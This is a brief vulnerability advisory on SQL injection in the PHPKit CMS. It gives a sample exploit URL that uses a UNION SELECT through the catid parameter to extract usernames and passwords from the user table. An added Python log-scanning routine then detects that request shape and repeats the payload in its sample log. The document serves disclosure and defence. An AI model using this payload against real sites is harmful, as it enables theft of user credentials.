PHPKit Multiple SQL Injection Vulnerabilities

Attackers can exploit these issues via a web client.

The following sample exploit is available:

http://www.example.com/include.php?path=faq/faq.php&catid=-1\'%20UNION%20SELECT%201,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20FROM%20phpkit_user%20where%20%20user_id=1%20and%20\'1\'=\'1
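
A defensive check for the request shape shown above, as an added example that is not part of the original advisory: it scans access-log lines for `include.php` requests whose `catid` value is not a plain integer or carries SQL syntax. The integer-only rule for `catid`, the common-log-format layout, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate catid is a plain non-negative integer.
VALID_CATID = re.compile(r"\d{1,10}")
SQL_TOKENS = re.compile(r"\b(?:union|select|from|where)\b|['\"\\]|--|/\*", re.I)
# Assumed common log format: client ident user [time] "METHOD target HTTP/x.y"
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+"')

def check_request(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    if not parts.path.endswith("/include.php"):
        return []
    findings = []
    # parse_qs percent-decodes values; keep blanks so "catid=" is inspected.
    for value in parse_qs(parts.query, keep_blank_values=True).get("catid", []):
        if not VALID_CATID.fullmatch(value):
            findings.append("catid is not an integer")
        if SQL_TOKENS.search(value):
            findings.append("catid contains SQL syntax")
    return findings

def scan_access_log(lines):
    """Return (client, findings) for every flagged access-log line."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        findings = check_request(m.group(2)) if m else []
        if findings:
            hits.append((m.group(1), findings))
    return hits

# Constructed sample log; the second entry carries the advisory's request.
SAMPLE_LOG = r"""192.0.2.10 - - [01/Feb/2010:10:00:00 +0000] "GET /include.php?path=faq/faq.php&catid=3 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Feb/2010:10:00:05 +0000] "GET /include.php?path=faq/faq.php&catid=-1\'%20UNION%20SELECT%201,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20FROM%20phpkit_user%20where%20%20user_id=1%20and%20\'1\'=\'1 HTTP/1.1" 200 4096
192.0.2.10 - - [01/Feb/2010:10:00:09 +0000] "GET /index.php?catid=x HTTP/1.1" 200 100
""".splitlines()

if __name__ == "__main__":
    for client, findings in scan_access_log(SAMPLE_LOG):
        print(client, "; ".join(findings))
```

The same integer-only rule, enforced in the application before `catid` reaches a query, is the corresponding input-validation control; the log scan only finds requests after the fact.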


 

Copyright 2010, SecurityFocus